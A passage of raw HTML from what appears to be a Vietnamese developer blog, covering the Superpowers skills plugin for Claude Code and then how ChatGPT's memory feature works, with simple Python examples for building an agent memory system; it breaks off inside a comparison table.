--tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; border: 1px solid rgb(214, 214, 214); padding: 6px 13px;"><strong style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; color: rgb(0, 0, 0);">OpenCode</strong></td><td style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; border: 1px solid rgb(214, 214, 214); padding: 6px 13px;">Fetch instructions từ repo</td></tr></tbody></table><!--kg-card-end: html--><h4 id="c-i-cho-claude-code-chi-ti-t-">Cài cho Claude Code (chi tiết):</h4><pre><code class="language-bash"># Cách 1: Official Marketplace (recommended)
/plugin install superpowers@claude-plugins-official

# Cách 2: Superpowers Marketplace
/plugin marketplace add obra/superpowers-marketplace
/plugin install superpowers@superpowers-marketplace
</code></pre><p>Cài xong. Không cần config gì thêm. AI tự có Superpowers.</p><hr><h3 id="4-workflow-chi-ti-t-7-b-c-t-t-ng-n-code">4. Workflow chi tiết — 7 bước từ ý tưởng đến code</h3><figure class="kg-card kg-image-card"></figure><hr><h3 id="5-demo-tr-c-v-sau-khi-c-superpowers">5. Demo: Trước và sau khi có Superpowers</h3><h4 id="scenario-th-m-authentication-cho-api">Scenario: Thêm authentication cho API</h4><p><strong>TRƯỚC (Không có Superpowers):</strong></p><pre><code class="language-text">User: "Add JWT authentication to the API"

Claude Code:
→ Cài jsonwebtoken
→ Tạo middleware auth.js
→ Thêm vào tất cả routes
→ Quên test
→ Quên refresh token
→ Quên error handling cho expired token
→ Hardcode secret trong code
→ Bạn phải fix thêm 2 tiếng
</code></pre><p><strong>SAU (Có Superpowers):</strong></p><pre><code class="language-text">User: "Add JWT authentication to the API"

Claude Code (with Superpowers):

━━━ BRAINSTORMING ━━━
"Mình có vài câu hỏi trước khi bắt đầu:"
- Access token + refresh token hay chỉ access token?
- Token expire sau bao lâu?
- Lưu secret ở đâu? env var?
- Có cần role-based access control không?
- Routes nào public, routes nào protected?

User: "Access + refresh, 15min/7day, env var, 
       có RBAC, /auth/* public còn lại protected"

━━━ DESIGN SPEC ━━━
[Show spec từng phần cho user approve]

━━━ PLAN ━━━
Task 1: Setup JWT config + env vars (2 min)
Task 2: Create auth middleware - test first (3 min)
Task 3: Login endpoint + test (4 min)
Task 4: Refresh token endpoint + test (4 min)
Task 5: RBAC middleware + test (3 min)
Task 6: Apply to routes + integration test (5 min)

━━━ EXECUTE (TDD) ━━━
[Mỗi task: write failing test → implement → pass → commit]

━━━ REVIEW ━━━
✓ All tests pass
✓ No hardcoded secrets
✓ Error handling complete
✓ Ready to merge
</code></pre><figure class="kg-card kg-image-card"></figure><hr><h3 id="6-b-n-trong-skills-library">6. Bên trong Skills Library</h3><p>Superpowers gồm 14 skills, chia 4 nhóm:</p><figure class="kg-card kg-image-card"></figure><h4 id="skill-highlight-test-driven-development">Skill highlight: Test-Driven Development</h4><p>Đây là skill "cứng" nhất — AI bị <strong>bắt buộc</strong> theo quy trình:</p><figure class="kg-card kg-image-card"></figure><p>Nếu AI viết code trước khi viết test → Superpowers <strong>xoá code đó</strong> và bắt làm lại đúng quy trình. Không nhân nhượng.</p><hr><h3 id="7-subagent-driven-development-ph-n-hay-nh-t">7. Subagent-Driven Development — Phần hay nhất</h3><p>Đây là tính năng cho phép Claude Code chạy <strong>autonomous hàng giờ</strong> mà không cần bạn can thiệp:</p><figure class="kg-card kg-image-card"></figure><p>Mỗi subagent là một "fresh agent" — không có context cũ, chỉ nhận task description rõ ràng. Giống thuê junior engineer: cho brief chuẩn → output chuẩn.</p><hr><h3 id="8-philosophy-t-i-sao-superpowers-hi-u-qu-">8. Philosophy — Tại sao Superpowers hiệu quả?</h3><p>4 nguyên tắc cốt lõi:</p><figure class="kg-card kg-image-card"></figure><hr><h3 id="9-systematic-debugging-c-ch-debug-c-h-th-ng">9. Systematic Debugging — Cách debug có hệ thống</h3><p>Khi gặp bug, Superpowers enforce quy trình 4 phase:</p><figure class="kg-card kg-image-card"></figure><p>So với cách AI debug thông thường (đoán → sửa → đoán → sửa), approach này tiết kiệm rất nhiều iterations.</p><hr><h3 id="10-th-c-t-s-d-ng-tips-kinh-nghi-m">10. Thực tế sử dụng — Tips & Kinh nghiệm</h3><h3 id="tip-1-ai-brainstorm-l-u">Tip 1: Để AI brainstorm đủ lâu</h3><p>Nhiều người vội skip phần brainstorming. Đừng. Đây là phần tạo ra sự khác biệt lớn nhất. AI hỏi được những câu mà bạn quên hỏi chính mình.</p><h3 id="tip-2-review-plan-k-tr-c-khi-go">Tip 2: Review plan kỹ trước khi "go"</h3><p>Plan là "bản thiết kế" cho AI execution. Plan sai → toàn bộ execution sai. Dành 2-3 phút đọc plan trước khi approve.</p><h3 id="tip-3-k-t-h-p-v-i-git-worktrees">Tip 3: Kết hợp với Git Worktrees</h3><p>Superpowers tự tạo branch riêng cho mỗi feature. Nếu AI đi sai hướng, bạn chỉ cần discard branch — không ảnh hưởng main code.</p><pre><code class="language-bash"># Superpowers tự động:
git worktree add ../feature-auth feature/add-auth
# → Workspace riêng, branch riêng
# → Fail? Discard. Không sợ.
</code></pre><h3 id="tip-4-d-ng-cho-task-ph-c-t-p-kh-ng-d-ng-cho-task-n-gi-n">Tip 4: Dùng cho task phức tạp, không dùng cho task đơn giản</h3><pre><code class="language-text">✓ Phù hợp:
  - Feature mới cần thiết kế
  - Refactor lớn
  - Bug phức tạp nhiều component
  - Migration / Integration

✗ Overkill:
  - Fix typo
  - Rename variable
  - Thêm 1 field đơn giản
  - Format code
</code></pre><hr><h3 id="11-so-s-nh-v-i-c-c-approach-kh-c">11. So sánh với các approach khác</h3><figure class="kg-card kg-image-card"></figure><hr><h3 id="12-k-t-lu-n">12. Kết luận</h3><p>Superpowers không phải magic. Nó là <strong>engineering discipline được đóng gói thành markdown</strong> và auto-enforce bởi AI agent.</p><p>Giá trị cốt lõi:</p><blockquote>AI coding agent + Superpowers = Junior engineer có SOP chuẩn,<br>làm việc 24/7, không skip test, không skip review.</blockquote><p>3 điều quan trọng nhất mình rút ra sau khi dùng:</p><ol><li><strong>Discipline > Intelligence</strong> — AI đã đủ thông minh. Thiếu kỷ luật mới là vấn đề.</li><li><strong>Plan trước, code sau</strong> — 5 phút planning tiết kiệm 2 tiếng fixing.</li><li><strong>TDD không phải optional</strong> — Khi AI bị ép viết test trước, chất lượng code tăng rõ rệt.</li></ol><p><strong>228k</strong> stars trên GitHub không phải tự nhiên có. Thử cài và chạy 1 feature — bạn sẽ hiểu tại sao.</p><hr><h3 id="ngu-n-tham-kh-o">Nguồn tham khảo</h3><ul><li><a href="https://github.com/obra/superpowers">GitHub: obra/superpowers</a> — Source code & documentation</li><li><a href="https://blog.fsck.com/2025/10/09/superpowers/">Blog Jesse Vincent</a> — Release announcement</li><li><a href="https://discord.gg/35wsABTejz">Discord community</a> — Hỏi đáp & chia sẻ</li><li><a href="https://docs.anthropic.com/claude-code">Claude Code Documentation</a> — Docs chính thức</li></ul>
</article>
<article>
<h1>Reverse Engineering tính năng Memory của ChatGPT: Cơ chế bên trong và cách tự thiết kế tính năng Memorize cho Agent của bạn</h1>
<p>N.Đ.L — Thu, 25 Jun 2026 03:17:31 GMT</p>
<p></p><h1 id="chatgpt-memory-ho-t-ng-nh-th-n-o-v-c-ch-t-build-memory-system-cho-ai-agent-c-a-b-n"><strong>ChatGPT Memory hoạt động như thế nào — và cách tự build Memory System cho AI Agent của bạn</strong></h1><figure class="kg-card kg-image-card"></figure><h1 id="t-ng-quan"><strong>Tổng quan</strong></h1><p>Chắc anh em nào cũng đã gặp cảnh này rồi:</p><p>Mở ChatGPT lên, chat một hồi, hỏi đủ thứ về dự án. Rồi đóng trình duyệt. Hôm sau mở lại — con bot nhìn mình như người lạ. <em>"Bạn là ai? Bạn đang làm gì vậy?"</em> (sad)</p><p>Xong tự hỏi: <strong>Sao nó không nhớ gì cả?</strong></p><p>Rồi OpenAI tung ra tính năng <strong>Memory</strong> — ChatGPT giờ nhớ bạn thích viết TypeScript, nhớ bạn đang build SaaS, nhớ bạn đang dùng Next.js App Router… Mà không cần bạn phải nói lại từ đầu mỗi lần.</p><p>Và câu hỏi đặt ra là: <strong>Cơ chế đằng sau cái "nhớ" đó là gì? Nó lưu ở đâu? Và nếu muốn build một agent có khả năng tương tự thì phải làm sao?</strong></p><p>Bài này mình sẽ đi sâu vào:</p><p><strong>1. ChatGPT Memory thật sự hoạt động như thế nào bên dưới?</strong></p><p><strong>2. Kiến trúc 4 lớp và 4 loại memory</strong></p><p><strong>3. Luồng retrieval từng bước khi user gửi tin nhắn</strong></p><p><strong>4. Cách tự build memory system cho AI agent của bạn</strong></p><p><strong>5. Privacy controls — phần hay bị bỏ qua</strong></p><p>Let's go!</p><hr><h1 id="1-chatgpt-nh-b-ng-c-ch-n-o"><strong>1. ChatGPT "nhớ" bằng cách nào?</strong></h1><p>Trước khi đi vào kỹ thuật, mình muốn phá bỏ một hiểu lầm phổ biến:</p><blockquote>ChatGPT không có bộ nhớ như não người. Nó không "nhớ" theo nghĩa liên tục. Mỗi request gửi lên vẫn là stateless.</blockquote><p><strong>Vậy cái "nhớ" đó đến từ đâu?</strong></p><p>Hãy tưởng tượng thế này:</p><p>Bạn đi khám bác sĩ. Ông ấy không nhớ bạn từng gặp, nhưng trước khi vào phòng khám, y tá đã đưa cho ông ấy tờ hồ sơ ghi rõ: <em>"Bệnh nhân dị ứng penicillin, năm ngoái gãy tay phải, thích hỏi về tác dụng phụ thuốc…"</em></p><p>Bác sĩ đọc tờ hồ sơ đó → nói chuyện với bạn như thể đã quen từ lâu.</p><p><strong>ChatGPT Memory hoạt động y hệt như vậy.</strong></p><p>Trước khi model nhận tin nhắn của bạn, hệ thống đã nhét vào đầu nó một đống context về bạn dưới dạng <strong>system prompt</strong>. Cụ thể là 3 phần:</p><ul><li><strong>Model Set Context</strong>: Những thông tin cố định về bạn (tên, nghề nghiệp, sở thích…)</li><li><strong>Assistant Response Preferences</strong>: Bạn thích được trả lời kiểu gì (ngắn gọn, có code, có ví dụ thực tế…)</li><li><strong>Recent Conversation Content</strong>: Tóm tắt từ các cuộc hội thoại gần đây liên quan</li></ul><p>→ Model "nhớ" vì nó <strong>đọc hồ sơ của bạn</strong>, không phải vì nó thật sự có long-term memory.</p><p>Đây là lý do tại sao bạn có thể xem và xóa từng memory trong Settings → Personalization → Memory — vì chúng chỉ là văn bản được lưu trong database, không phải gì "huyền bí" trong não model.</p><hr><h1 id="2-ki-n-tr-c-4-l-p-b-n-trong"><strong>2. Kiến trúc 4 lớp bên trong</strong></h1><p>Nhìn tổng thể, hệ thống memory của ChatGPT (và các AI assistant tương tự) gồm <strong>4 lớp chính</strong>:</p><figure class="kg-card kg-image-card"></figure><h3 id="l-p-1-user-interface-layer"><strong>Lớp 1: User Interface Layer</strong></h3><p>Phần người dùng nhìn thấy và tương tác được:</p><ul><li>Màn hình quản lý memories (xem, chỉnh, xóa từng item)</li><li>Toggle bật/tắt toàn bộ tính năng Memory</li><li>Chế độ <strong>Temporary Chat</strong> — chat không lưu gì, như incognito mode của trình duyệt</li></ul><p>Đây là lớp mà OpenAI thiết kế rất kỹ để đảm bảo user luôn có quyền kiểm soát.</p><h3 id="l-p-2-memory-processing-engine"><strong>Lớp 2: Memory Processing Engine</strong></h3><p>Đây là "bộ não xử lý" — phần phức tạp nhất và ít được nói đến nhất:</p><ul><li><strong>Extraction</strong>: Sau mỗi cuộc hội thoại, một LLM nhỏ (extraction model) đọc lại toàn bộ conversation và trích xuất những thông tin đáng lưu. Ví dụ: từ đoạn hội thoại về việc bạn đang build app, nó extract ra <em>"User đang dùng Next.js 14 App Router, deploy trên Vercel"</em></li><li><strong>Deduplication</strong>: Nếu thông tin mới giống với memory đã có, thay vì tạo duplicate, engine sẽ merge hoặc update.</li><li><strong>Conflict Resolution</strong>: Bạn từng nói dùng Vue, hôm nay nói dùng React — engine phải xử lý mâu thuẫn. Cách phổ biến: memory mới hơn thường override memory cũ, nhưng cũng có thể merge thành <em>"User đã chuyển từ Vue sang React"</em>.</li><li><strong>Indexing</strong>: Tạo vector embedding cho mỗi memory để phục vụ semantic search sau này.</li></ul><h3 id="l-p-3-storage-layer"><strong>Lớp 3: Storage Layer</strong></h3><p>Nơi thật sự lưu dữ liệu — không phải một database duy nhất mà là nhiều loại storage cho từng mục đích:</p><!--kg-card-begin: html--><table style="box-sizing: border-box; border-collapse: collapse; margin-bottom: 0px; margin-top: 1em; display: block; width: 700px; overflow: auto; color: rgb(27, 27, 27); font-family: "Open Sans", -apple-system, BlinkMacSystemFont, "Segoe UI", "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 18px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(255, 255, 255); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><thead style="box-sizing: border-box;"><tr style="box-sizing: border-box;"><th style="box-sizing: border-box; text-align: -webkit-match-parent; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Storage Type</th><th style="box-sizing: border-box; text-align: -webkit-match-parent; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Dùng cho</th><th style="box-sizing: border-box; text-align: -webkit-match-parent; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Ví dụ</th></tr></thead><tbody style="box-sizing: border-box;"><tr style="box-sizing: border-box;"><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;"><strong style="box-sizing: border-box; font-weight: bolder;">Relational DB</strong><span> </span>(PostgreSQL)</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">User profile, preferences</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;"><code style="box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Ubuntu Mono", "Liberation Mono", Menlo, Courier, monospace; font-size: 1em; color: inherit; overflow-wrap: break-word; padding: 3px 5px; border-radius: 2px; background-color: rgb(238, 238, 238);">user_id, language, timezone</code></td></tr><tr style="box-sizing: border-box;"><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;"><strong style="box-sizing: border-box; font-weight: bolder;">Vector DB</strong><span> </span>(Pinecone, Weaviate)</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Episodic memories, semantic search</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Embeddings của conversation summaries</td></tr><tr style="box-sizing: border-box;"><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;"><strong style="box-sizing: border-box; font-weight: bolder;">Key-Value Store</strong><span> </span>(Redis)</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Session cache, active context</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">5-10 tin nhắn gần nhất</td></tr><tr style="box-sizing: border-box;"><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;"><strong style="box-sizing: border-box; font-weight: bolder;">Object Storage</strong><span> </span>(S3)</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Long-term archives</td><td style="box-sizing: border-box; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Toàn bộ conversation history (compressed)</td></tr></tbody></table><!--kg-card-end: html--><h3 id="l-p-4-llm-integration-layer"><strong>Lớp 4: LLM Integration Layer</strong></h3><p>Lớp ghép nối memory vào prompt context trước khi gửi cho model. Đây là nơi quyết định <strong>memory nào được chọn</strong> để đưa vào context hiện tại.</p><blockquote>Quan trọng nhất là lớp này — vì context window có giới hạn, không thể nhét hết toàn bộ memory vào. Cần có cơ chế <strong>chọn lọc thông minh</strong>: chỉ lấy những memories <em>liên quan nhất</em> với câu hỏi hiện tại của user.</blockquote><p>Cơ chế chọn lọc này thường là kết hợp:</p><ul><li><strong>Semantic similarity</strong> (embedding cosine similarity): memory nào nói về chủ đề gần với câu hỏi hiện tại?</li><li><strong>Recency weight</strong>: memory gần đây được ưu tiên hơn memory cũ</li><li><strong>Explicit keyword match</strong>: nếu user nhắc đến tên project, tên tool cụ thể</li></ul><hr><h1 id="3-4-lo-i-memory-kh-ng-ph-i-t-t-c-u-gi-ng-nhau"><strong>3. 4 loại Memory — Không phải tất cả đều giống nhau</strong></h1><p>Đây là phần nhiều người hay nhầm. Memory không phải một khái niệm đồng nhất. Có <strong>4 loại khác nhau</strong>, mỗi loại có cách lưu, cách truy vấn và lifecycle riêng:</p><figure class="kg-card kg-image-card"></figure><h3 id="lo-i-1-user-profile-memory-persistent-facts-"><strong>Loại 1: User Profile Memory (Persistent Facts)</strong></h3><p><strong>Ví von:</strong> Đây như tờ hồ sơ cá nhân trong ngăn kéo của bác sĩ — thông tin cố định, ít thay đổi, nhưng rất quan trọng để cá nhân hóa.</p><ul><li><strong>Lưu ở</strong>: Structured database (SQL, key-value)</li><li><strong>Ví dụ nội dung</strong>: tên, nghề nghiệp, stack yêu thích, timezone, ngôn ngữ ưa dùng, sở thích về response style (ngắn gọn vs chi tiết)</li><li><strong>Lifetime</strong>: Indefinite — tồn tại cho đến khi user chủ động xóa</li><li><strong>Cập nhật khi</strong>: Có thông tin mới rõ ràng hoặc conflict với thông tin cũ</li></ul><p>Trong ChatGPT, đây là những gì bạn thấy khi vào Settings → Personalization → Manage Memories. Mỗi item là một "fact" về bạn.</p><h3 id="lo-i-2-conversation-history-episodic-memory-"><strong>Loại 2: Conversation History (Episodic Memory)</strong></h3><p><strong>Ví von:</strong> Như nhật ký — ghi lại đúng những gì đã xảy ra, theo thứ tự thời gian, kèm timestamp và context.</p><p>Loại memory này quan trọng bởi vì nó cho phép agent hồi tưởng: <em>"À, tuần trước mình và user đã thảo luận về vấn đề JWT expiration — liên quan đến câu hỏi hôm nay không nhỉ?"</em></p><ul><li><strong>Lưu ở</strong>: Vector database (để semantic search)</li><li><strong>Ví dụ</strong>: <em>"Ngày 20/3, user hỏi về Docker networking issue và mình đề xuất dùng overlay network"</em>, <em>"Ngày 22/3, user báo overlay network hoạt động tốt, đóng ticket"</em></li><li><strong>Lifetime</strong>: Indefinite với optional archiving (move sang cold storage sau 6 tháng)</li><li><strong>Truy vấn</strong>: Kết hợp semantic similarity + timestamp filtering</li></ul><blockquote>ChatGPT hiện tại đưa vào context khoảng <strong>40 entries gần nhất</strong> trong prompt. Phần còn lại vẫn được lưu nhưng cần explicit retrieval khi có semantic match đủ mạnh.</blockquote><p>Đây chính là lý do tại sao ChatGPT có thể nhớ <em>"Anh đang build SaaS về HR management"</em> dù bạn mention điều đó 3 tuần trước — episodic memory của câu đó vẫn còn trong vector DB, và khi bạn hỏi câu liên quan, retrieval engine tìm ra nó.</p><h3 id="lo-i-3-extracted-knowledge-semantic-memory-"><strong>Loại 3: Extracted Knowledge (Semantic Memory)</strong></h3><p><strong>Ví von:</strong> Như ghi chú tóm tắt của một sinh viên giỏi — không phải chép nguyên bài giảng, mà trích lọc ra những insight quan trọng, có cấu trúc, dễ tra cứu.</p><p>Đây là kết quả của bước <strong>information extraction</strong> từ Conversation History. Thay vì lưu nguyên cuộc hội thoại dài 50 tin nhắn, engine trích xuất ra:</p><p><em>"User đang build B2B SaaS về HR management, tech stack: Next.js 14 App Router + Supabase + Tailwind, deploy Vercel, prefer Server Components, tránh client-side fetching khi không cần thiết."</em></p><p>Chỉ vài dòng nhưng capture được đủ context để cá nhân hóa.</p><ul><li><strong>Lưu ở</strong>: Hybrid (structured + vector) để vừa tìm kiếm semantic vừa filter chính xác</li><li><strong>Lifecycle</strong>: Được update và merge khi có thông tin mới. Ví dụ: nếu sau đó bạn nói <em>"Mình vừa chuyển từ Supabase sang PlanetScale"</em>, engine update memory thay vì tạo duplicate</li><li><strong>Đặc điểm</strong>: Đây là loại memory "cao cấp" nhất — nó không phải raw data mà là <strong>curated knowledge</strong> về user</li></ul><h3 id="lo-i-4-active-context-working-memory-"><strong>Loại 4: Active Context (Working Memory)</strong></h3><p><strong>Ví von:</strong> Như RAM trong máy tính — cực nhanh, cực accessible, nhưng chỉ tồn tại khi đang chạy. Tắt máy là mất.</p><p>Đây là cái mà dân AI hay gọi là <strong>"in-context memory"</strong> — toàn bộ conversation hiện tại đang nằm trong context window của model.</p><ul><li><strong>Lưu ở</strong>: Prompt buffer (trực tiếp trong context window)</li><li><strong>Ví dụ</strong>: 5–10 tin nhắn gần nhất trong session hiện tại</li><li><strong>Lifetime</strong>: Session only — hết session là flush vào Episodic Memory (nếu có gì đáng lưu) rồi xóa</li><li><strong>Tốc độ truy cập</strong>: Instant — vì model đang đọc trực tiếp, không cần retrieval</li></ul><blockquote><strong>Mối quan hệ giữa 4 loại:</strong> Active Context → kết thúc session → flush vào Conversation History → extraction engine chạy → tạo Extracted Knowledge → cập nhật User Profile (nếu có thay đổi quan trọng). Đây là vòng lifecycle của memory.</blockquote><hr><h1 id="4-lu-ng-ho-t-ng-khi-b-n-g-i-m-t-tin-nh-n"><strong>4. Luồng hoạt động khi bạn gửi một tin nhắn</strong></h1><p>Mình sẽ trace từng bước để mọi người thấy rõ. Ví dụ bạn gõ: <em>"Hôm nay mình muốn refactor cái authentication module"</em></p><figure class="kg-card kg-image-card"></figure><p><strong>Bước quan trọng nhất</strong> chính là <strong>Retrieval Phase</strong> — hệ thống tìm kiếm memories nào <em>liên quan nhất</em> với câu hỏi hiện tại, không phải nhét hết tất cả vào.</p><p>Cả flow này diễn ra trong vài hundred milliseconds — đó là lý do response vẫn nhanh dù phải query thêm database.</p><p><strong>Điểm thú vị về Conflict Detection:</strong></p><p>Hệ thống phải check xem memories có mâu thuẫn nhau không trước khi đưa vào context. Ví dụ: memory A nói <em>"Dùng Pages Router"</em>, memory B nói <em>"Dùng App Router"</em> — nếu nhét cả hai vào context, model bị confuse.</p><p>Giải pháp phổ biến: <strong>timestamp-based resolution</strong> — memory mới hơn được ưu tiên, memory cũ được đánh dấu là deprecated hoặc xóa.</p><hr><h1 id="5-t-build-memory-system-cho-agent-c-a-b-n"><strong>5. Tự build Memory System cho Agent của bạn</strong></h1><p>Phần thú vị nhất. Mình sẽ đi qua <strong>3-tier architecture</strong> — kiến trúc đơn giản nhất nhưng đủ mạnh cho hầu hết use cases.</p><figure class="kg-card kg-image-card"></figure><h3 id="tier-1-short-term-context-memory-c-i-n-gi-n-nh-t"><strong>Tier 1: Short-Term Context Memory — Cái đơn giản nhất</strong></h3><p>Chỉ là một list các messages được giữ trong session, tự động trim khi vượt quá giới hạn:</p><pre><code class="language-python"># short_term_memory.py
conversation_history = []
MAX_HISTORY = 10

def add_message(role: str, content: str):
    """Thêm message vào short-term memory"""
    conversation_history.append({
        "role": role,
        "content": content
    })
    # Trim nếu vượt quá giới hạn — xóa message cũ nhất
    if len(conversation_history) > MAX_HISTORY:
        conversation_history.pop(0)

def get_history() -> list:
    return conversation_history

def clear_history():
    conversation_history.clear()
</code></pre><p>Dùng cho: Context tức thời trong session hiện tại. Không cần database, không cần embedding — đơn giản nhất nhưng hiệu quả cho chat thông thường.</p><h3 id="tier-2-user-profile-memory-d-li-u-ng-i-d-ng-l-u-d-i"><strong>Tier 2: User Profile Memory — Dữ liệu người dùng lâu dài</strong></h3><p>Lưu trong structured database. Với prototype, SQLite hoặc thậm chí JSON file là đủ:</p><pre><code class="language-python"># user_profile.py
import json
import os
from datetime import datetime

PROFILE_DB_PATH = "user_profiles.json"

def load_profiles():
    if os.path.exists(PROFILE_DB_PATH):
        with open(PROFILE_DB_PATH, "r") as f:
            return json.load(f)
    return {}

def save_profiles(profiles):
    with open(PROFILE_DB_PATH, "w") as f:
        json.dump(profiles, f, indent=2, ensure_ascii=False)

def get_user_profile(user_id: str) -> dict:
    profiles = load_profiles()
    return profiles.get(user_id, {})

def update_user_profile(user_id: str, updates: dict):
    """Update profile — merge với data hiện có"""
    profiles = load_profiles()
    if user_id not in profiles:
        profiles[user_id] = {"created_at": datetime.now().isoformat()}
    
    profiles[user_id].update(updates)
    profiles[user_id]["updated_at"] = datetime.now().isoformat()
    save_profiles(profiles)

# Ví dụ sử dụng
update_user_profile("user_123", {
    "preferences": {
        "language": "Vietnamese",
        "programming_language": "TypeScript",
        "framework": "Next.js",
        "response_style": "concise_with_examples"
    },
    "facts": {
        "role": "Backend Developer",
        "project": "HR SaaS startup",
        "timezone": "Asia/Ho_Chi_Minh"
    }
})
</code></pre><p>Trong production, replace JSON file bằng PostgreSQL hoặc MongoDB. Schema tương tự, chỉ đổi storage layer.</p><h3 id="tier-3-episodic-long-term-memory-v-i-vector-database"><strong>Tier 3: Episodic Long-Term Memory với Vector Database</strong></h3><p>Đây là phần quan trọng nhất khi muốn agent "nhớ" long-term. Cần một <strong>vector database</strong> để lưu và tìm kiếm theo semantic similarity.</p><p><strong>So sánh 3 lựa chọn phổ biến:</strong></p><!--kg-card-begin: html--><table style="box-sizing: border-box; border-collapse: collapse; margin-bottom: 0px; margin-top: 1em; display: block; width: 700px; overflow: auto; color: rgb(27, 27, 27); font-family: "Open Sans", -apple-system, BlinkMacSystemFont, "Segoe UI", "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 18px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(255, 255, 255); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><thead style="box-sizing: border-box;"><tr style="box-sizing: border-box;"><th style="box-sizing: border-box; text-align: -webkit-match-parent; border: 1px solid rgb(214, 214, 215); padding: 0.75rem; vertical-align: top;">Vector DB</th><th style="box-sizing: border-box; text-align: -webkit-match-parent; border: 1px solid 